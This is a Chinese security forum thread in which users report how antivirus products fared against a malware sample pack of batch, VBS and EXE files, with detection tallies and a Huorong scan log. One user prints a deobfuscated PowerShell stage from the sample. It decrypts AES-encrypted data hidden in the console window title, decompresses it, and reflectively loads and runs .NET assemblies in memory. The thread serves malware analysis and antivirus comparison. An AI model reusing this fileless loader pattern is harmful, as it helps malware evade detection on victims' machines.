x5 (2024-03-26)

DisaPDB

petr0vic 发表于 2024-3-26 16:54
miss all
infected

seems like there's something differences between the two versions
01.bat

02.bat

2.vbs

3.exe


Total:4/5

祸兮福所倚

keen-qv 发表于 2024-3-26 15:57
小a忠实用户！

外面的毒好杀，心中的毒难除！我还没能在人生的大梦中觉醒，总这样玩杀毒混下去也不是个办法，即将春暖花开，我要去寻找人生的意义!

dght432

DisaPDB 发表于 2024-3-26 17:45
seems like there's something wrong between the two versions
01.bat

阻止开机启动应该算
miss了

DisaPDB

dght432 发表于 2024-3-26 17:51
阻止开机启动应该算
miss了

后面有拦截PowerShell调用
简单看了一下

1. # 定义常量
   
2. $EncryptionKeyBase64 = 'TZZo3Oy5UDTtuZMlgdmieEOW4zZIIcSc2xfryRmaONM='
   
3. $EncryptionIVBase64 = '7GraJ09wxBgZlzUP66oYKg=='
   
4. $AES = [System.Security.Cryptography.Aes]::Create()
   
5. $AES.Mode = [System.Security.Cryptography.CipherMode]::CBC
   
6. $AES.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
   
7. $AES.Key = [System.Convert]::FromBase64String($EncryptionKeyBase64)
   
8. $AES.IV = [System.Convert]::FromBase64String($EncryptionIVBase64)
   
9. 
   
10. # 加密/解密函数
    
11. function Encrypt-Data ($data) {
    
12.     return $AES.CreateEncryptor().TransformFinalBlock($data, 0, $data.Length)
    
13. }
    
14. 
    
15. function Decrypt-Data ($encryptedData) {
    
16.     return $AES.CreateDecryptor().TransformFinalBlock($encryptedData, 0, $encryptedData.Length)
    
17. }
    
18. 
    
19. # 解压缩函数
    
20. function Decompress-Data ($compressedData) {
    
21.     $inputStream = New-Object System.IO.MemoryStream @(, $compressedData)
    
22.     $outputStream = New-Object System.IO.MemoryStream
    
23.     $gzipStream = New-Object System.IO.Compression.GZipStream $inputStream, [IO.Compression.CompressionMode]::Decompress
    
24.     $gzipStream.CopyTo($outputStream)
    
25.     $gzipStream.Dispose()
    
26.     $inputStream.Dispose()
    
27.     return $outputStream.ToArray()
    
28. }
    
29. 
    
30. # 获取当前命令行窗口标题
    
31. $windowTitle = [Console]::Title
    
32. 
    
33. # 提取并解密数据
    
34. $encryptedPart1 = [System.Linq.Enumerable]::Skip([char[]]$windowTitle, 5).ToArray() -join ''
    
35. $decryptedPart1 = Decrypt-Data ([System.Convert]::FromBase64String($encryptedPart1))
    
36. 
    
37. $encryptedPart2 = [System.Linq.Enumerable]::Skip([char[]]$windowTitle, 6).ToArray() -join ''
    
38. $decryptedPart2 = Decrypt-Data ([System.Convert]::FromBase64String($encryptedPart2))
    
39. 
    
40. # 解压缩数据
    
41. $decompressedPart1 = Decompress-Data $decryptedPart1
    
42. $decompressedPart2 = Decompress-Data $decryptedPart2
    
43. 
    
44. # 反射加载并执行恶意代码
    
45. $assembly1 = [System.Reflection.Assembly]::Load($decompressedPart1)
    
46. $assembly1.EntryPoint.Invoke($null, $null)
    
47. 
    
48. $assembly2 = [System.Reflection.Assembly]::Load($decompressedPart2)
    
49. $assembly2.EntryPoint.Invoke($null, $null)

复制代码

keen-qv

祸兮福所倚 发表于 2024-3-26 17:50
外面的毒好杀，心中的毒难除！我还没能在人生的大梦中觉醒，总这样玩杀毒混下去也不是个办法，即将春暖花 ...

内心的病毒并不难除去。你需要感谢它，内心的挣扎与困惑，正是人生成长与觉醒的过程所在。在追寻人生意义的道路上，正视内心系统的隐秘深处，勇敢面对内心的病毒，不要逃避或忽视。通过内心的探索与洞察，或许能够找到清晰的方向，解开心中的纠结？最终获得更深层次的认知与觉悟。不应将内心的病毒视作无法除去的顽固病毒，它并没有与你内心的安全软件做对抗，反而是将其视为成长与觉醒的契机，犹如ai查杀引擎的不断进化，希望你能走向更高层次的人生境界。

biue

Nocria

Avira - 1/5

UNknownOoo

火绒
扫描：3x

1. 病毒详情：
   
2. 风险路径：C:\Users\UnknownOoo\Downloads\Compressed\02.bat, 病毒名：Trojan/BAT.Agent.bw, 病毒ID：9d30624f2530e8ed, 处理结果：暂不处理
   
3. 风险路径：C:\Users\UnknownOoo\Downloads\Compressed\01.bat, 病毒名：Trojan/BAT.Agent.bw, 病毒ID：9d30624f2530e8ed, 处理结果：暂不处理
   
4. 风险路径：C:\Users\UnknownOoo\Downloads\Compressed\2.vbs, 病毒名：Trojan/Generic!EF5416F1E9857E78, 病毒ID：ef5416f1e9857e78, 处理结果：暂不处理
   

复制代码

swizzer

DI all.

神龟Turmi

petr0vic 发表于 2024-3-26 16:54
miss all
infected

360TS FileLess Protection require VIP...